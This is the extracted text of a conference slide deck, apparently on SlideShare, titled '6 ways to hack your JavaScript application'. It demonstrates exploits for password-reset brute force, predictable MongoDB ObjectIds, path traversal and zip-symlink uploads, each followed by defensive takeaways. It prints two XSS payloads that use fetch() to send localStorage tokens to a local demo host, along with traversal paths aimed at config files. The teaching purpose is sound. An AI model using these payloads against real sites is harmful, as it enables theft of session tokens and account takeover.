SlideShare une entreprise Scribd logo
1  sur  66
Télécharger pour lire hors ligne
6 ways to hack your JavaScript application by Viktor Turskyi
Viktor Turskyi
● CEO at WebbyLab
● 15 years in software development
Why I talk about security?
1. I switched to software development from IT security
2. I work with software engineers for many years and this topic is highly
undercovered
3. I work with different businesses for many years and risks are highly
underestimated
4. Governmental regulations (GDPR, PCI DSS etc)
5. It makes you a better software engineer
6. It is FUN!!
What I will talk about?
1. Not about OWASP (Open Web Application Security Project) Top 10 report
2. Not about security tools (metasploit, sqlmap etc)
3. Not about content security policy.
4. Only practical cases that we’ve met in real life.
5. JavaScript based demos
6. Real cases simulated in environment
a. React frontend
b. NodeJs backend
c. Set of exploits
Overview of the existing application
Let’s play a game
1. I show you a piece of application code with vulnerability.
2. Who sees the vulnerability?
3. I run exploit
4. You guess the exploits algorithm
5. I go through exploit in details
Case 1: Password recovery by SMS
Case 1: Description
To improve security a company decided to use SMS for password recovery.
User enters own email and receives on phone code like: 7483
Run exploit
How does the exploit work?
Case 1: Takeaways
Think about bruteforce.
Reset codes:
SMS codes
CAPTCHA Codes
Limit requests per IP is not a solution
6 ways to hack your JavaScript application by Viktor Turskyi
Case 2: Email password recovery
/reset-password?actionId=5c6a84d97955741020400f3f
6 ways to hack your JavaScript application by Viktor Turskyi
Run exploit
How does the exploit work?
6 ways to hack your JavaScript application by Viktor Turskyi
Algorithm
1. Prepare payloads for any object creation and password restore link
generation.
2. Send them simultaneously.
3. Use got ObjectId of newly created object as base
4. Increment counters (at first) and timestamp (it is in seconds,+-1 is enough in
most cases)
5. Use the new object id for password recovery
Mongo <= v3.2
Mongo >= v3.4
6 ways to hack your JavaScript application by Viktor Turskyi
Case 2: Takeaways
Mongo ID predictable (on all version of mongo)
UUID v1 predictable (unique, but not random)
UUID v4 unpredictable
Always think about predictability of URLs (keys, etc)
Case 3: File paths
6 ways to hack your JavaScript application by Viktor Turskyi
Run exploit
How does the exploit work?
Let’s look step by step
A lot of frameworks had this vulnerability
ACSII: CHAR “.” = DEC 46 = HEX 2E = %2E (in URL)
/static/../etc/config.json
/static/%2e%2e/etc/config.json
Main reason: validate, then escape (should be escape, then validate)
Algorithm
1. Prepare path where do you expect to have sensitive data (configs).
2. Replace dots in relative paths with “%2e”
3. Get configs with JWT keys
4. Create own session for any user
Very popular modules can be vulnerable (11k weekly downloads)
Use npm audit (NODEJS DEVS ARE LUCKY TO HAVE IT)
Check your dependencies
Security is a question of trust
apt update
JWT vulnerability example (next slides)
Case 3: Takeaways
JWT vulnerability example
RFC 7119 JSON Web Token (JWT)
Case 4: Photos upload
6 ways to hack your JavaScript application by Viktor Turskyi
Run exploit
How does the exploit work?
Algorithm
1. Prepare zip archive and pack symlink which references server configuration.
2. Upload zip archive to server
3. Download the uploaded file (which is symlink in real). It will return server
config
4. Create own session using a key from the config
decompress
Case 4: Takeaways
Thinks about edge cases
Just know how system works
Zip-Slip (next slides)
Zip-Slip
Case 5: Tweet creation
6 ways to hack your JavaScript application by Viktor Turskyi
Run exploit
How does the exploit work?
6 ways to hack your JavaScript application by Viktor Turskyi
Tweet text:
'<span>Hello world2</span> <img style="display:none" src="WRONG"
onerror="fetch('http://localhost:5000?token='+localStorage.getItem('token'))" />'
Case 5: Takeaways
IF YOU SEE WYSIWYG, CHECK YOUR CODE FOR XSS
Do not use regex for extracting script tags
Use sanitizer with tags and attrs white-listing
CORS will allow you do cross domain request
XSS worms issues
Case 6: The most popular vulnerability in
ReactJs boilerplates
6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi
6 ways to hack your JavaScript application by Viktor Turskyi
Run exploit
How does the exploit work?
6 ways to hack your JavaScript application by Viktor Turskyi
</script><script>fetch('http://localhost:5000?token=' +
localStorage.getItem('google_experiment_mod'))</script><script>
6 ways to hack your JavaScript application by Viktor Turskyi
Case 6: Takeaways
Know HTML page parsing (inline JS not the same as external JS)
Think about data usage context
Use “serialize-javascript”: serializeJs(initialState, { isJSON: true }) instead of
JSON.stringify(initialState)
Case 7: Network risks
Case 7: Takeaways
Think about communication
Get the whole picture
Use HTTPS everywhere
Case 8..14:
Case 8: Clickjacking
Case 9: Tabnapping
Case 10: CSRF (cookie, basic auth)
Case 11: SQL Injection (pass through ORM)
Case 12: ORM Injection
Case 13: Unsafe HTTPS Redirect
Case 14: Target=_blank (without rel="noopener noreferrer")
Do you know how these things work?
Heartbleed
Shellshock
WPA Krack
Meltdown and Spectre
Why I like information security?
Information security is about understanding how things work
It makes you a better developer
You can create more complex projects
It is fun!
Thank you!
Telegram: @JABASCRIPT
6 ways to hack your JavaScript application by Viktor Turskyi
Viktor Turskyi
viktor@webbylab.com
@koorchik @koorchik
https://webbylab.com

Contenu connexe

Tendances

Systems Introspection
Systems IntrospectionSystems Introspection
Systems IntrospectionAndrew Howden
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
Automating Malware Analysis
Automating Malware AnalysisAutomating Malware Analysis
Automating Malware Analysissecurityxploded
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosImma Valls Bernaus
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
Elixir metaprogramming
Elixir metaprogrammingElixir metaprogramming
Elixir metaprogrammingKamil Lelonek
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareKaspersky
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 -  Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 -  Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysissecurityxploded
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Venkat Raman
 
[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)OWASP EEE
 

Tendances (20)

Systems Introspection
Systems IntrospectionSystems Introspection
Systems Introspection
 
Generics in java
Generics in javaGenerics in java
Generics in java
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
Isaa lab assessment 3
Isaa lab assessment 3Isaa lab assessment 3
Isaa lab assessment 3
 
Automating Malware Analysis
Automating Malware AnalysisAutomating Malware Analysis
Automating Malware Analysis
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018
 
Elixir metaprogramming
Elixir metaprogrammingElixir metaprogramming
Elixir metaprogramming
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Automating malware analysis
Automating malware analysis Automating malware analysis
Automating malware analysis
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 -  Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 -  Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1
 
[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)
 

Similaire à 6 ways to hack your JavaScript application by Viktor Turskyi

KharkivJS 2018 Information Security Practice
KharkivJS 2018 Information Security PracticeKharkivJS 2018 Information Security Practice
KharkivJS 2018 Information Security PracticeViktor Turskyi
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerSteve Poole
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsPVS-Studio
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Exploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version EnglishExploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version Englishchen yuki
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
Security Automation Simplified - BSides Austin 2019
Security Automation Simplified - BSides Austin 2019Security Automation Simplified - BSides Austin 2019
Security Automation Simplified - BSides Austin 2019Moses Schwartz
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Debugging Complex Systems - Erlang Factory SF 2015
Debugging Complex Systems - Erlang Factory SF 2015Debugging Complex Systems - Erlang Factory SF 2015
Debugging Complex Systems - Erlang Factory SF 2015lpgauth
 
Browser exploitation SEC-T 2019 stockholm
Browser exploitation SEC-T 2019 stockholmBrowser exploitation SEC-T 2019 stockholm
Browser exploitation SEC-T 2019 stockholmJameel Nabbo
 
Vcenter Server Case Study
Vcenter Server Case StudyVcenter Server Case Study
Vcenter Server Case StudySharon Lee
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Yury Chemerkin
 
Development Of A Simulation Management System
Development Of A Simulation Management SystemDevelopment Of A Simulation Management System
Development Of A Simulation Management SystemHeather Vargas
 
[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to TestZsolt Fabok
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
Google Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docxGoogle Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docxwhittemorelucilla
 

Similaire à 6 ways to hack your JavaScript application by Viktor Turskyi (20)

KharkivJS 2018 Information Security Practice
KharkivJS 2018 Information Security PracticeKharkivJS 2018 Information Security Practice
KharkivJS 2018 Information Security Practice
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developer
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source Components
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazy
 
Exploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version EnglishExploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version English
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
 
Security Automation Simplified - BSides Austin 2019
Security Automation Simplified - BSides Austin 2019Security Automation Simplified - BSides Austin 2019
Security Automation Simplified - BSides Austin 2019
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
 
Debugging Complex Systems - Erlang Factory SF 2015
Debugging Complex Systems - Erlang Factory SF 2015Debugging Complex Systems - Erlang Factory SF 2015
Debugging Complex Systems - Erlang Factory SF 2015
 
Browser exploitation SEC-T 2019 stockholm
Browser exploitation SEC-T 2019 stockholmBrowser exploitation SEC-T 2019 stockholm
Browser exploitation SEC-T 2019 stockholm
 
Vcenter Server Case Study
Vcenter Server Case StudyVcenter Server Case Study
Vcenter Server Case Study
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 Arsenal
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...
 
Development Of A Simulation Management System
Development Of A Simulation Management SystemDevelopment Of A Simulation Management System
Development Of A Simulation Management System
 
[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec glory
 
Google Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docxGoogle Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docx
 

Plus de OdessaJS Conf

'GraphQL Schema Design' by Borys Mohyla. OdessaJS'2021
'GraphQL Schema Design' by Borys Mohyla. OdessaJS'2021'GraphQL Schema Design' by Borys Mohyla. OdessaJS'2021
'GraphQL Schema Design' by Borys Mohyla. OdessaJS'2021OdessaJS Conf
 
'How i came up with my talk' by Yurii Artiukh. OdessaJS'2021
'How i came up with my talk' by Yurii Artiukh. OdessaJS'2021'How i came up with my talk' by Yurii Artiukh. OdessaJS'2021
'How i came up with my talk' by Yurii Artiukh. OdessaJS'2021OdessaJS Conf
 
"Is there life in react without redux" by Babich Sergiy. OdessaJS'2021
"Is there life in react without redux" by Babich Sergiy. OdessaJS'2021"Is there life in react without redux" by Babich Sergiy. OdessaJS'2021
"Is there life in react without redux" by Babich Sergiy. OdessaJS'2021OdessaJS Conf
 
Олексій Павленко. CONTRACT PROTECTION ON THE FRONTEND SIDE: HOW TO ORGANIZE R...
Олексій Павленко. CONTRACT PROTECTION ON THE FRONTEND SIDE: HOW TO ORGANIZE R...Олексій Павленко. CONTRACT PROTECTION ON THE FRONTEND SIDE: HOW TO ORGANIZE R...
Олексій Павленко. CONTRACT PROTECTION ON THE FRONTEND SIDE: HOW TO ORGANIZE R...OdessaJS Conf
 
Андрій Троян. Розробка мікросервісів з NestJS. OdessaJS'2021
Андрій Троян. Розробка мікросервісів з NestJS. OdessaJS'2021Андрій Троян. Розробка мікросервісів з NestJS. OdessaJS'2021
Андрій Троян. Розробка мікросервісів з NestJS. OdessaJS'2021OdessaJS Conf
 
Олексій Гончар "Використання Electron в розробці корпоративної відео-мессeндж...
Олексій Гончар "Використання Electron в розробці корпоративної відео-мессeндж...Олексій Гончар "Використання Electron в розробці корпоративної відео-мессeндж...
Олексій Гончар "Використання Electron в розробці корпоративної відео-мессeндж...OdessaJS Conf
 
Максим Климишин "Що такого особливого у пропозиції вартості шаблону Micro Fro...
Максим Климишин "Що такого особливого у пропозиції вартості шаблону Micro Fro...Максим Климишин "Що такого особливого у пропозиції вартості шаблону Micro Fro...
Максим Климишин "Що такого особливого у пропозиції вартості шаблону Micro Fro...OdessaJS Conf
 
Павло Галушко. GOOD CODE MYTHS. OdessaJS'2021
Павло Галушко. GOOD CODE MYTHS. OdessaJS'2021Павло Галушко. GOOD CODE MYTHS. OdessaJS'2021
Павло Галушко. GOOD CODE MYTHS. OdessaJS'2021OdessaJS Conf
 
"NODEJS & GRAPHQL COOKBOOK. LET’S TALK ABOUT MICRO-SERVICES" by Антон Чередні...
"NODEJS & GRAPHQL COOKBOOK. LET’S TALK ABOUT MICRO-SERVICES" by Антон Чередні..."NODEJS & GRAPHQL COOKBOOK. LET’S TALK ABOUT MICRO-SERVICES" by Антон Чередні...
"NODEJS & GRAPHQL COOKBOOK. LET’S TALK ABOUT MICRO-SERVICES" by Антон Чередні...OdessaJS Conf
 
'BUILDING ANGULAR APPS WITH NX' by Anastasia Necheporenko
'BUILDING ANGULAR APPS WITH NX' by Anastasia Necheporenko'BUILDING ANGULAR APPS WITH NX' by Anastasia Necheporenko
'BUILDING ANGULAR APPS WITH NX' by Anastasia NecheporenkoOdessaJS Conf
 
'IS THERE JAVASCRIPT ON SWAGGER PLUGINS?' by Dmytro Gusev
'IS THERE JAVASCRIPT ON SWAGGER PLUGINS?' by  Dmytro Gusev'IS THERE JAVASCRIPT ON SWAGGER PLUGINS?' by  Dmytro Gusev
'IS THERE JAVASCRIPT ON SWAGGER PLUGINS?' by Dmytro GusevOdessaJS Conf
 
'ETHEREUM SMART CONTRACTS ON JS' by Yaroslav Dvorovenko
'ETHEREUM SMART CONTRACTS ON JS' by Yaroslav Dvorovenko'ETHEREUM SMART CONTRACTS ON JS' by Yaroslav Dvorovenko
'ETHEREUM SMART CONTRACTS ON JS' by Yaroslav DvorovenkoOdessaJS Conf
 
'GOLANG USAGE IN DEVELOPMENT OF NODE.JS APPLICATIONS (NODE.JS: IN GO WE TRUST...
'GOLANG USAGE IN DEVELOPMENT OF NODE.JS APPLICATIONS (NODE.JS: IN GO WE TRUST...'GOLANG USAGE IN DEVELOPMENT OF NODE.JS APPLICATIONS (NODE.JS: IN GO WE TRUST...
'GOLANG USAGE IN DEVELOPMENT OF NODE.JS APPLICATIONS (NODE.JS: IN GO WE TRUST...OdessaJS Conf
 
'MICROFRONTENDS WITH REACT' by Liliia Karpenko
 'MICROFRONTENDS WITH REACT' by Liliia Karpenko 'MICROFRONTENDS WITH REACT' by Liliia Karpenko
'MICROFRONTENDS WITH REACT' by Liliia KarpenkoOdessaJS Conf
 
'Web performance metrics' BY ROMAN SAVITSKYI at OdessaJS'2020
'Web performance metrics' BY ROMAN SAVITSKYI at OdessaJS'2020'Web performance metrics' BY ROMAN SAVITSKYI at OdessaJS'2020
'Web performance metrics' BY ROMAN SAVITSKYI at OdessaJS'2020OdessaJS Conf
 
'STORY OF ANOTHER ANIMATION' by YURII ARTYUKH at OdessaJS'2020
'STORY OF ANOTHER ANIMATION' by  YURII ARTYUKH at OdessaJS'2020'STORY OF ANOTHER ANIMATION' by  YURII ARTYUKH at OdessaJS'2020
'STORY OF ANOTHER ANIMATION' by YURII ARTYUKH at OdessaJS'2020OdessaJS Conf
 
'JavaScript was invented in Odessa' by DMITRIY GUSEV at OdessaJS'2020
'JavaScript was invented in Odessa' by DMITRIY GUSEV at OdessaJS'2020'JavaScript was invented in Odessa' by DMITRIY GUSEV at OdessaJS'2020
'JavaScript was invented in Odessa' by DMITRIY GUSEV at OdessaJS'2020OdessaJS Conf
 
'Why svelte' by BORYS MOHYLA at OdessaJS'2020
'Why svelte' by BORYS MOHYLA at OdessaJS'2020'Why svelte' by BORYS MOHYLA at OdessaJS'2020
'Why svelte' by BORYS MOHYLA at OdessaJS'2020OdessaJS Conf
 
'Effective node.js development' by Viktor Turskyi at OdessaJS'2020
'Effective node.js development' by Viktor Turskyi at OdessaJS'2020'Effective node.js development' by Viktor Turskyi at OdessaJS'2020
'Effective node.js development' by Viktor Turskyi at OdessaJS'2020OdessaJS Conf
 
'Tensorflow.js in real life' by Pavlo Galushko at OdessaJS'2020
'Tensorflow.js in real life' by Pavlo Galushko at OdessaJS'2020'Tensorflow.js in real life' by Pavlo Galushko at OdessaJS'2020
'Tensorflow.js in real life' by Pavlo Galushko at OdessaJS'2020OdessaJS Conf
 

Plus de OdessaJS Conf (20)

'GraphQL Schema Design' by Borys Mohyla. OdessaJS'2021
'GraphQL Schema Design' by Borys Mohyla. OdessaJS'2021'GraphQL Schema Design' by Borys Mohyla. OdessaJS'2021
'GraphQL Schema Design' by Borys Mohyla. OdessaJS'2021
 
'How i came up with my talk' by Yurii Artiukh. OdessaJS'2021
'How i came up with my talk' by Yurii Artiukh. OdessaJS'2021'How i came up with my talk' by Yurii Artiukh. OdessaJS'2021
'How i came up with my talk' by Yurii Artiukh. OdessaJS'2021
 
"Is there life in react without redux" by Babich Sergiy. OdessaJS'2021
"Is there life in react without redux" by Babich Sergiy. OdessaJS'2021"Is there life in react without redux" by Babich Sergiy. OdessaJS'2021
"Is there life in react without redux" by Babich Sergiy. OdessaJS'2021
 
Олексій Павленко. CONTRACT PROTECTION ON THE FRONTEND SIDE: HOW TO ORGANIZE R...
Олексій Павленко. CONTRACT PROTECTION ON THE FRONTEND SIDE: HOW TO ORGANIZE R...Олексій Павленко. CONTRACT PROTECTION ON THE FRONTEND SIDE: HOW TO ORGANIZE R...
Олексій Павленко. CONTRACT PROTECTION ON THE FRONTEND SIDE: HOW TO ORGANIZE R...
 
Андрій Троян. Розробка мікросервісів з NestJS. OdessaJS'2021
Андрій Троян. Розробка мікросервісів з NestJS. OdessaJS'2021Андрій Троян. Розробка мікросервісів з NestJS. OdessaJS'2021
Андрій Троян. Розробка мікросервісів з NestJS. OdessaJS'2021
 
Олексій Гончар "Використання Electron в розробці корпоративної відео-мессeндж...
Олексій Гончар "Використання Electron в розробці корпоративної відео-мессeндж...Олексій Гончар "Використання Electron в розробці корпоративної відео-мессeндж...
Олексій Гончар "Використання Electron в розробці корпоративної відео-мессeндж...
 
Максим Климишин "Що такого особливого у пропозиції вартості шаблону Micro Fro...
Максим Климишин "Що такого особливого у пропозиції вартості шаблону Micro Fro...Максим Климишин "Що такого особливого у пропозиції вартості шаблону Micro Fro...
Максим Климишин "Що такого особливого у пропозиції вартості шаблону Micro Fro...
 
Павло Галушко. GOOD CODE MYTHS. OdessaJS'2021
Павло Галушко. GOOD CODE MYTHS. OdessaJS'2021Павло Галушко. GOOD CODE MYTHS. OdessaJS'2021
Павло Галушко. GOOD CODE MYTHS. OdessaJS'2021
 
"NODEJS & GRAPHQL COOKBOOK. LET’S TALK ABOUT MICRO-SERVICES" by Антон Чередні...
"NODEJS & GRAPHQL COOKBOOK. LET’S TALK ABOUT MICRO-SERVICES" by Антон Чередні..."NODEJS & GRAPHQL COOKBOOK. LET’S TALK ABOUT MICRO-SERVICES" by Антон Чередні...
"NODEJS & GRAPHQL COOKBOOK. LET’S TALK ABOUT MICRO-SERVICES" by Антон Чередні...
 
'BUILDING ANGULAR APPS WITH NX' by Anastasia Necheporenko
'BUILDING ANGULAR APPS WITH NX' by Anastasia Necheporenko'BUILDING ANGULAR APPS WITH NX' by Anastasia Necheporenko
'BUILDING ANGULAR APPS WITH NX' by Anastasia Necheporenko
 
'IS THERE JAVASCRIPT ON SWAGGER PLUGINS?' by Dmytro Gusev
'IS THERE JAVASCRIPT ON SWAGGER PLUGINS?' by  Dmytro Gusev'IS THERE JAVASCRIPT ON SWAGGER PLUGINS?' by  Dmytro Gusev
'IS THERE JAVASCRIPT ON SWAGGER PLUGINS?' by Dmytro Gusev
 
'ETHEREUM SMART CONTRACTS ON JS' by Yaroslav Dvorovenko
'ETHEREUM SMART CONTRACTS ON JS' by Yaroslav Dvorovenko'ETHEREUM SMART CONTRACTS ON JS' by Yaroslav Dvorovenko
'ETHEREUM SMART CONTRACTS ON JS' by Yaroslav Dvorovenko
 
'GOLANG USAGE IN DEVELOPMENT OF NODE.JS APPLICATIONS (NODE.JS: IN GO WE TRUST...
'GOLANG USAGE IN DEVELOPMENT OF NODE.JS APPLICATIONS (NODE.JS: IN GO WE TRUST...'GOLANG USAGE IN DEVELOPMENT OF NODE.JS APPLICATIONS (NODE.JS: IN GO WE TRUST...
'GOLANG USAGE IN DEVELOPMENT OF NODE.JS APPLICATIONS (NODE.JS: IN GO WE TRUST...
 
'MICROFRONTENDS WITH REACT' by Liliia Karpenko
 'MICROFRONTENDS WITH REACT' by Liliia Karpenko 'MICROFRONTENDS WITH REACT' by Liliia Karpenko
'MICROFRONTENDS WITH REACT' by Liliia Karpenko
 
'Web performance metrics' BY ROMAN SAVITSKYI at OdessaJS'2020
'Web performance metrics' BY ROMAN SAVITSKYI at OdessaJS'2020'Web performance metrics' BY ROMAN SAVITSKYI at OdessaJS'2020
'Web performance metrics' BY ROMAN SAVITSKYI at OdessaJS'2020
 
'STORY OF ANOTHER ANIMATION' by YURII ARTYUKH at OdessaJS'2020
'STORY OF ANOTHER ANIMATION' by  YURII ARTYUKH at OdessaJS'2020'STORY OF ANOTHER ANIMATION' by  YURII ARTYUKH at OdessaJS'2020
'STORY OF ANOTHER ANIMATION' by YURII ARTYUKH at OdessaJS'2020
 
'JavaScript was invented in Odessa' by DMITRIY GUSEV at OdessaJS'2020
'JavaScript was invented in Odessa' by DMITRIY GUSEV at OdessaJS'2020'JavaScript was invented in Odessa' by DMITRIY GUSEV at OdessaJS'2020
'JavaScript was invented in Odessa' by DMITRIY GUSEV at OdessaJS'2020
 
'Why svelte' by BORYS MOHYLA at OdessaJS'2020
'Why svelte' by BORYS MOHYLA at OdessaJS'2020'Why svelte' by BORYS MOHYLA at OdessaJS'2020
'Why svelte' by BORYS MOHYLA at OdessaJS'2020
 
'Effective node.js development' by Viktor Turskyi at OdessaJS'2020
'Effective node.js development' by Viktor Turskyi at OdessaJS'2020'Effective node.js development' by Viktor Turskyi at OdessaJS'2020
'Effective node.js development' by Viktor Turskyi at OdessaJS'2020
 
'Tensorflow.js in real life' by Pavlo Galushko at OdessaJS'2020
'Tensorflow.js in real life' by Pavlo Galushko at OdessaJS'2020'Tensorflow.js in real life' by Pavlo Galushko at OdessaJS'2020
'Tensorflow.js in real life' by Pavlo Galushko at OdessaJS'2020
 

Dernier

20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
